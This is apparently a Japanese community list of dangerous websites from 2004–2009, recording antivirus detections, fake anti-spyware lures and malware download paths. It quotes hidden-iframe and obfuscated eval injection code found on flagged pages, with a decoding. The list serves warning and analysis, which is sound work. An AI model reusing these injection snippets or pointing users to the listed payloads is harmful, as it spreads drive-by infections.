通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
[2005/07/19] | 踏むと こんな感じの画面 。画面の左上のほうの濃い青の部分全体がリンクになっている。
濃い青の部分も含めて画面全体の何処を右クリックしても これ を表示。 濃い青の部分をクリックすると、下のURLに飛び、「SpySpotterWebInstall.exe」なるexeのDLを促してくる。フルスクリーンでの実行も促してくる。 //e.spyspotter.com/landings/lp238-9723?a=369&r=428&c=5039 googleで検索すると、それ自身がスパイウェアと呼べるような、いわゆるインチキスパイウエア対策ソフトらしい。 |
[2005/12/19] | 踏むと こんな感じ 。画面のどこを右クリックしても これ が出る。
「O.K.」をクリックしてください…云々と書いてあるが、文章や「OK」ボタン周辺がリンクになっている。リンクを踏むと こんな感じ( @ ) のページを新窓表示して、ダイアログを表示、それを拒否すると こんな感じ( A ) のページを表示して「pyspotterwebinstall.exe」なるアプリケーションをDLしろ、と言ってくる。 A を閉じると こんな感じ( B ) のページを新窓表示して、ダイアログを表示、それを拒否すると「pyspotterwebinstall.exe」をDLしろ、と言ってくる。B は普通に閉じれる。「pyspotterwebinstall.exe」は C のURLである。 このexeが有害であるかどうかは不明だが、スパイウェア駆除ソフトを装ったスパイウェアの可能性がある。番号は以下のURLである。 @ → //e.spyspotter.com/landings/lp593-12230?a=783&r=1179&c=7996 A → //c.spyspotter.com/landings/593-12230/alt_download_REG.html?783-1179-7996-593 B → //c.spyspotter.com/landings/593-12230/landing2_REG.html?783-1179-7996-593 C → //download.spyspotter.com/spyspotter/sp3.02r/spyspotterwebinstall.exe |
[2005/12/19] | 他の方の結果は以下の「」内。
「スパイウェア対策サイトらしいですが、怪しすぎます。進むとexeファイルを落とそうとしてきます。」 |
[2005/12/20] | 「あなたのコンピューターがスパイウェアのダメージを…と脅して、スキャンの実行を促しつつ、何やら怪しげなexeを実行させようとします。」 |
[2004/11/24] | 洋ロリサイトでSPYBOTが反応し、ノートンがTrojan Horseを検出するらしい。
バスターでは反応無しだがHDDが唸りだし、暫くしてIEが落ちる。 |
[2009/01/15] | 真っ白なページだが、ウィルス名:JS_REAPLAY.B を検出。 |
[2004/04/29] | 無限JavaScript。mailtoストーム。ブラクラチェッカーの診断結果:JS_NIMDA.A(PE_NIMDA.Aの可能性) |
[2004/06/02] | 色んなブラクラサイトに新規ウィンドウでアクセスされる。 |
[2004/08/26] | 現在は//masaton1192.tripod.com/を呼ぶ。 |
[2008/08/20] | 2008/08/19 にDLしたファイルには、ウィルス名:TROJ_NUWAR.GXZ を検出。
しかし、今日改めて当該URLを調べてみると 404 になっていた。 |
[2004/07/31] | ウィルス名:PE_IDYLL_WILD |
[2004/07/31] | ウィルス名:W97M_CLASS.BH |
[2004/07/31] | ウィルス名:WORM_SKA.A |
[2005/09/04] | 再確認。Forbiddenになっている。 |
[2004/07/31] | ウィルス名:W97M_MELISSA.A |
[2004/07/31] | ウィルス名:VBS_LOVELETTER-O |
[2004/06/06] | ウィルス関連と思われる英語テキストファイルでファイルそのものにウィルスは無い[ 安全 ] |
[2004/07/31] | ウィルス名:PE_PADANIA |
[2004/07/31] | ウィルス名:ASCIIV.613-O |
[2004/07/31] | ウィルス名:DOGGY* |
[2004/07/31] | ウィルス名:URKEL* |
[2004/07/31] | ウィルスの詰め合わせ。
ウィルス名:EXE2WIN.133-E+HTTM.241+ANT633+EXE2WIN.132-E+EXE2WIN.214-E+WIN.1241+DATAMLST-1+WINVIR14 |
[2004/09/11] | ウィルス名:PE_Mtx.A |
[2005/05/08] | 「99bb月額見放題」という日本語アダルトサイトだが、ウィルス名:HTML_REDIR.Aを検出。 |
[2008/08/19] | ウィルス名:TSC_GENCLEAN+TROJ_SRIZBI.L |
[2005/02/03] | exeファイル3つ入っているが全てウィルス。詳細は以下。
client.exe ←ウィルス名:Backdoor.Trojan.Client [ノートン] 、BKDR_ASYLUM.013 [ウィルスバスター] config.exe ←ウィルス名:W32.Slackoe.dr [ノートン] 、TROJ_YABINDER.20 [ウィルスバスター] server.exe ←ウィルス名:Backdoor.Asylun [ノートン]、BKDR_ASYLUM [ウィルスバスター] |
[2005/02/06] | トロイの木馬というハッキングツールの一種。 アンチウィルスソフトは反応するがserver.exe以外はPC無害らしい。 |
[2005/01/24] | ウイルス名:Backdoor.NetDevil[ノートン]。バスターは無反応。
オンラインファイルスキャンに掛けるとウィルス名:Backdoor.Win32.Bifrose.dを検出。 ハッカーが感染先のコンピュータを遠隔操作できるようにするバックドアトロイの木馬らしい。 |
[2004/02/18] | //ime.nu/や//pinktower.com/経由はブラクラ。
Refererでブラクラに飛ばすかどうか決めているらしい。 |
[2004/08/18] | リファをチェックするCGIが動いている。
リファがある=ime.nuや他の転送URLからきた物=2chに直リンクされたものはブラクラにリダイレクト。 直接打ちだと画像が表示される。 |
[2009/03/23] | ファイルサイズ:1.17 MB 。ウィルス名:TROJ_DLOADER.SGW |
[2009/03/23] | 以下のファイルが落ちてくる。このファイルからウィルス名:TROJ_DLOADER.SGW を検出。
//ejams.com/chat/atualizacao.exe |
[2008/07/29] | こんな感じ のサイト。怪しい音楽付きである。
ウィルスやスパイウェアがDL出来るらしいが、未確認。 悪用厳禁であることには間違いないが、大抵のウィルスファイルには各社ウィルス駆除ソフトで対応済みであろうと思われる。 しかし、実際に対応してるかどうかは確認していないので要注意。 |
[2008/07/29] | 他の方の結果では、
「chez-alice.fr」というタイトルの主にウイルスなどを紹介・DLできる怪しい外国サイトでした。 音量が出るので一応注意、当環境ではそこまで Kaspersky 無反応ですがマカフィーアドバイザーでアドウェア、スパイウェア、ウイルスとの判定が出ているので踏まない方がいいでしょう。 |
[2008/08/19] | こんな感じ のサイト。以下の @ のファイルをDLしろ、と言ってくる。
少し経って、ActiveX 実行の要求もしてきて、ウィルス名:JS_PSYME.CJA を検出。 @、//eledentransex.com/get_flash_update.exe |
[2008/08/19] | ウィルス名:TSC_GENCLEAN+TROJ_RENOS.AFT |
[2008/08/19] | 8秒後に //eledentransex.com/index1.html に飛ぶので、そちらのURL List解説を参照。 |
[2008/08/27] | ウィルス名:TSC_GENCLEAN+TROJ_FAKEAV.FP |
[2008/12/04] | 「Video_legal.com」という名前のMS-DOSアプリケーションファイルが落ちてくるが、ウィルス名:CRYP_MANGLED を検出。 |
[2008/08/20] | こんな感じ のサイトだが、ウィルス名:TSC_GENCLEAN+HTML_AGENT.AVYZ を検出。
ソースを見ると、ほとんどがコード変換されていて、読みにくいよう工夫されている。その中に以下のURLが隠れている。 //elpatiodejesusmaria.com/adobe_flash.exe ← ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.Y |
[2008/08/20] | ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.Y |
[2008/08/27] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AWRZ |
[2009/01/03] | ウィルス名:TROJ_EXCHANGE.CR |
[2005/03/06] | バスター無反応だが他アンチウィルスソフトでウイルス名:PWSteal.Trojanを検出するらしい。
ログイン名とパスワードを盗み出すトロイの木馬。サイトの内容は文字だけで詳細不明。 |
[2005/03/06] | 踏むと こんな感じの画面 。バスター無反応。
しかし、ソースを見ると一見綺麗なソースのように見えるが一番最後に下記↓の大文字小文字混じりの怪しいIFRAMEタグがあり、別のURLを呼び出していることが分かる。 <iFRAmE SRc=http://www.akoak.com/mf/1.htm width=0 hEight=0></iFRAmE> その呼び出されたURL://www.akoak.com/mf/1.htmのKiken URL List解説も参照。 |
[2007/03/06] | 環境により、下のexeファイルが落ちてくるが、ウィルス名:TROJ_DELF.ENL を検出。
//embratelbrasil21.t35.com/relatorionum13856.exe |
[2008/08/20] | 再確認。こんな感じ のサイト。1秒後に以下のファイルをDLしろ、と言ってきてウィルス名:TSC_GENCLEAN+PAK_Generic.006 を検出。
//embratelbrasil21.t35.com/relatorionum13856.exe |
[2007/03/06] | 2007/02/28 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DELF.ENL として検出するよう対応、とのこと。 実際に 2007/02/28 にDLしたファイルと、今日改めてDLしたファイルからからウィルス名:TROJ_DELF.ENL を検出することを確認。 2007/02/28 からきょうまではファイルの置き換えは行われていないと推測される。 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DLOAD.CE |
[2008/08/20] | ウィルス名:TSC_GENCLEAN+TROJ_DROP.CF |
[2008/09/04] | 2008/08/21 の時点でバスター無反応。2008/08/21 にトレンドマイクロ社にその日にDLしたファイルを提出。
2008/09/03 にその結果の連絡があり、「弊社では正常ファイルとして判断したファイルで、対応は行わない」とのこと。 しかし、他の主なウィルス駆除ソフトでは以下のように検出するので注意だが、今日改めて当該URLを見てみると 404 になっていた。 AVG → Dropper.Generic.AASJ DrWeb → Trojan.MulDrop.18428 eTrust-Vet → Win32/Bugnraw.EN Ikarus → Trojan-Downloader.Delf.OAQ K7AntiVirus → Trojan-Downloader.Win32.Agent.ablq Microsoft → TrojanDropper:Win32/Srizbi.H NOD32v2 → Win32/TrojanDropper.Agent.NMR Norman → W32/Srizbi.gen3 VBA32 → Trojan.MulDrop.18428 ViRobot → Trojan.Win32.Downloader.468480 VirusBuster → Trojan.DR.Rooter.I Webwasher-Gateway → Win32.Malware.dam |
[2008/08/20] | 真っ白なページだが、ウィルス名:TSC_GENCLEAN+HTML_DLOAD.DP を検出。 |
[2008/08/20] | ウィルス名:TSC_GENCLEAN+TROJ_ZLOB.CBG |
[2008/08/20] | こんな感じ のサイトだが、ウィルス名:TSC_GENCLEAN+HTML_ZLOB.CBG+HTML_DLOAD.DP を検出。
また、以下のファイルをDLしろ、と催促してくる。 //emineacar.com/codecinst.exe ← ウィルス名:TSC_GENCLEAN+TROJ_ZLOB.CBG |
[2009/01/03] | ウィルス名:TROJ_NUWAR.CYA |
[2008/12/04] | 2重拡張子。ウィルス名:TROJ_AGENT.AHEF |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DLOADER.GEN |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+Possible_Virus |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DLOADER.GEN |
[2008/07/20] | 解凍すると「engracado.exe」なるファイルが現れるが、バスターがトロイの木馬として即刻削除。 |
[2009/08/02] | ファイルサイズ:2.92 KB 。ウィルス名:TROJ_PIDIEF.ABI |
[2009/08/02] | 真っ白なページだが、ウィルス名:JS_ECIN.A を検出。 ソースのほとんどがコード変換されている。 |
[2005/01/30] | ウィルス名:JS_EXCEPTION.GEN |
[2005/04/09] | 改めて確認。//crack-casino.front.ru/ に飛び、ウィルス名:JS_EXCEPTION.GENを検出。定期的に別窓が表示される。 |
[2007/01/02] | ウィルス名:TSPY_BANCOS.CPP |
[2007/05/10] | ウィルス名:TROJ_GENERIC |
[2007/05/10] | ウィルス名:TSPY_BANKER.FGO |
[2007/05/10] | ウィルス名:TROJ_GENERIC |
[2009/03/23] | 長い名前の圧縮ファイルが落ちてくる。解凍すると「Cobrana110309.exe」ファイルが現れるが、ウィルス名:TROJ_BANLOAD.JMA を検出。 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_SRIZBI.P |
[2005/11/18] | 他の方の結果は以下の「」内。
「海外アダルトサイトです。ノートン無反応ですが、何かインストールさせようとしたり、ブラウザの「戻る」を押しても別のページに飛んだり、怪しさむんむん。踏まぬが吉。」 |
[2005/11/19] | 踏むと こんな感じ のアダルト漫画のサムネイルが並んだサイトだが、何回か確認すると稀に以下の2つのうち、どちらかを表示することがある。
|
[2006/11/09] | 海外アダルトサイトだが、何かをインストールしようとしてきてウィルス名:DIAL_EROSKOP.A を検出。 |
[2005/10/07] | ウィルス名:JS_INOR.AB 。閉じるとアダルトサイトを何枚か表示。何回か確認するとランダムに表示するらしいことが分かった。
確認した中で厄介だった症状は、閉じても閉じてもアダルトサイトがランダム的に開き続け、強制終了も効かなかった、という症状。 その時はバスターの緊急ロックをONにして脱出。 |
[2006/10/29] | 2006/10/22 2:55 の時点ではIFRAMEタグで以下の2つのURLを呼び出していたが、今日確認してみると、アクセス拒否であった。
//count4all.net/adv/033/new3.php //bestcount.net/adv/033/new.php それまでの他の方の結果は以下の「」内。 「Trojan-Downloader.JS.Inor.a 、Constructor.Perl.Msdds.b を Kaspersky で検出。」 |
[2005/09/20] | DL+解凍すると以下の2つのファイルが現れる。
UERSNetInstaller.inf ← セットアップ情報。これは無害。 UERSNetInstaller.exe ← バスター無反応だが、Kaspersky で反応:not-a-virus:Downloader.Win32.Agent.d |
[2009/08/08] | こんな感じ のサイト。ウィルス名:JS_DLOADER.UGD を検出。
閉じると これ を表示し、再び この画面 を表示する。 |
[2004/07/31] | ウィルス名:VBS_STARTPAGE.C |
[2006/08/03] | DL+解凍後の「egauth4_1050.dll」なるファイルをトレンドマイクロ社に提出。
今日、連絡があり、ウィルス名:DIAL_EGROUP.AT として検出するよう対応とのこと。 当該URLからファイルをDLしてウィルス名:DIAL_EGROUP.AT を検出することを確認。 ちなみに「egauth4_1050.dll」ファイルのサイズは 196KB である。 |
[2006/08/03] | DL+解凍後の「egauth4_1051.dll」なるファイルをトレンドマイクロ社に提出。
今日、連絡があり、ウィルス名:DIAL_EGROUP.AT として検出するよう対応とのこと。 当該URLからファイルをDLしてウィルス名:DIAL_EGROUP.AT を検出することを確認。 ちなみに「egauth4_1051.dll」ファイルのサイズは 126KB である。 |
[2006/08/03] | DL+解凍後の「egauth4_1052.dll」なるファイルをトレンドマイクロ社に提出。
今日、連絡があり、ウィルス名:DIAL_EGROUP.AT として検出するよう対応とのこと。 当該URLからファイルをDLしてウィルス名:DIAL_EGROUP.AT を検出することを確認。 ちなみに「egauth4_1052.dll」ファイルのサイズは 143KB である。 |
[2006/11/29] | DL+解凍すると「svcia32.dll」なるものが現れる。バスター無反応だが、以下のアンチウィルスソフトで反応。
Avast → Win32:Pcclient-BO eSafe → suspicious Trojan/Worm NOD32v2 → probably a variant of Win32/Dialer.Egroup Norman → W32/AOLTroj.BX 2006/11/12 にトレンドマイクロ社に「svcia32.dll」ファイルを提出。 2006/11/15 にその結果の連絡があり、「不正なコードは含まれておりません」 とのこと。 |
[2007/01/13] | 「Instant-Access.exe」なるファイルが落ちてくる。
2006/11/12 にトレンドマイクロ社にファイルを提出。 2006/11/15 にその結果の連絡があり、ウィルス名:DIAL_EGROUP.AS として検出するよう対応、とのこと。 実際に 2006/11/12 にDLしたファイルからウィルス名:DIAL_EGROUP.AS を検出することを確認。 しかし、2006/11/15 に改めて当該URLを調べてみるとバスター無反応。 2006/11/12 から 2006/11/15 までの間にファイルが置き換えられたと推測される。 2006/11/28 にトレンドマイクロ社にファイルを再提出。 2006/12/11 にその結果の連絡があり、ウィルス名:DIAL_EGROUP.AR として検出するよう対応、とのこと。 実際に 2006/11/28 にDLしたファイルからウィルス名:DIAL_EGROUP.AR を検出することを確認。 しかし、今日改めて当該URLを調べてみるとバスター無反応。 2006/11/28 から今日までの間に不定期的にファイルが置き換えられていると推測される。 |
[2009/01/03] | ウィルス名:TROJ_EXCHANGE.CR |
[2009/01/03] | ウィルス名:TROJ_DLOAD.DM |
[2008/08/21] | ウィルス名:TSC_GENCLEAN+Mal_Banker |
[2009/01/03] | ウィルス名:TROJ_DLOADER.RIP |
[2008/10/29] | ウィルス名:TROJ_SRIZBI.AF |
[2004/09/11] | 無限JavaScript。mailtoストーム。FDDアタック。 |
[2008/08/27] | ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AWRZ |
[2008/08/27] | ウィルス名:TSC_GENCLEAN+TROJ_FAKEAV.FP |
[2006/08/17] | ウィルス名:TROJ_SMALL.AXL |
[2007/01/02] | //ex17.2ch.net/ZZZ-news4vip/ を延々とリロードし続ける。ブラウザを閉じればそれで終わり。 |
[2004/08/21] | 無限JavaScript。FDDアタック。ソースストーム。内容は以下らしい。
「無限にノートパッドを開きつづける。しかもファイルの指定が全部のドライブだからフロッピーディスク&CD-Rドライブを痛めることになるかもしれない。 はまると消すのにかなり苦労します。よくネット上でブラクラの作り方とかあるけど無限のはないはず。 怖いのはXPだとこれを保存し,おいてあるフォルダを開きファイルを選択しただけでひっかかったりする。」 |
[2005/10/10] | 踏むと真っ白なページだが、少し経ってからウィルス名:JAVA_BYTEVER.A-1を検出。マカフィーでも反応するらしい。
ソースを見ると以下のようになっている。長い行があるので、適当な箇所で改行してある。 <html> <!-- Created on: 23.04.2005 --> <body> <script language=javascript>eval(String.fromCharCode( 100,111,99,117,109,101,110,116,46,119,114,105,116,101, 40,39,60,105,102,114,97,109,101,32,115,114,99,61,34,104, 116,116,112,58,47,47,56,50,46,49,55,57,46,49,55,48,46,49, 49,47,100,105,97,53,53,50,47,34,32,115,116,121,108,101,61, 34,100,105,115,112,108,97,121,58,110,111,110,101,34,62,60, 47,105,102,114,97,109,101,62,39,41))</script> </body> </html> ↑ これを復号化すると以下のようになる。//82.179.170.11/dia552/を呼んでいるのが原因。 ↓ <html> <!-- Created on: 23.04.2005 --> <body> <script language=javascript>eval(String.fromCharCode( document.write('<iframe src="http://82.179.170.11/dia552/" style="display:none"></iframe>')))</script> </body> </html> 以下は お寄せ頂いた //exclusivexxxporn.com/123.html に関する情報を記載。 「マカフィーがウイルスを検出しました。検出されたウイルス名と場所は以下です。
|
[2007/04/29] | 2006/12/25 にトレンドマイクロ社にファイルを提出。
2006/12/29 にその結果の連絡があり、ウィルス名:TSPY_BZUB.EC として検出するよう対応、とのこと。 しかし、今日改めて当該URLを見てみると404であった。実際に対応したかどうかの確認はできなかった。 |
[2006/12/24] | 踏むと真っ白なページでバスター無反応。
しかし、ソースはコード変換されていて読みにくく工夫されている。何かある模様。 |
[2006/10/27] | 2006/10/15 にトレンドマイクロ社にDL+解凍して現れた「Tcw.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_TINTDIAL.C として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_TINTDIAL.C を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_TINTDIAL.C を検出することを確認。 |
[2007/03/07] | 2006/10/11 にトレンドマイクロ社にファイルを提出。
2006/10/13 にその結果の連絡があり、「正常と判断したファイルで対応は行わない。」とのこと。 |
[2007/01/16] | 「adv_1.exe」ファイルが落ちてくる。2007/01/10 にトレンドマイクロ社に「adv_1.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_SMALL.FAO として検出するよう対応、とのこと。 実際に 2007/01/10 にDLしたファイルからウィルス名:TROJ_SMALL.FAO を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 2007/01/10 から今日までの間にファイルの置き換えがあったと推測される。 |
[2006/12/24] | ウィルス名:JAVA_BYTEVER.AQ+JAVA_BYTEVER.S
真っ白なページだが、ソースはコード変換されていて、何かを3つ呼び出している形跡がある。 |
[2008/08/21] | 2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AHEF |
[2009/04/07] | ファイルサイズ:104 KB。ウィルス名:TROJ_DLOADR.HO |
[2009/08/03] | 「load.exe」ファイルが落ちてくる。ファイルサイズ:32.5 KB 。このファイルからウィルス名:PAK_GENERIC.001 を検出。 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+DIAL_PRISPARKY+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD
このファイルの拡張子は「 exe 」ではなく、「 exe3 」なので注意。 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+DIAL_DIALER.PX+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD |
[2008/07/20] | ウィルス名:DIAL_PRISPARKY |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.DB |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.DB |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.DB |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+PAK_Generic.001 |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.GD |
[2008/07/20] | ウィルス名:TSC_GENCLEAN+TROJ_DIALER.ZF |
[2008/08/21] | DL+解凍すると「Install_foto_1_dia!.exe」なるファイルが現れるが、ウィルス名:TROJ_DROPPER.CKT を検出。 |